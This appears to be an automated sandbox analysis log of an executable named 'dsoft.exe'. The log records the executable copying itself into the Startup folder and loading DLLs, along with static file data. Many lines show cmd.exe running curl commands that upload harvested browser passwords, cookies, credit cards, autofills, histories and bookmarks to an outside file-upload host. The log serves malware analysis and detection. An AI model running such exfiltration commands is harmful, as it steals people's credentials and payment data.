Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Users\user\Desktop\dsoft.exe "C:\Users\user\Desktop\dsoft.exe"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile

Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: C:\Users\user\Desktop\dsoft.exe

File opened: C:\Users\user\Desktop\pyvenv.cfg

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: dsoft.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: dsoft.exe

Static file information: File size 15497216 > 1048576

Source: dsoft.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xe86e00

Source: dsoft.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: dsoft.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: dsoft.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: dsoft.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: dsoft.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
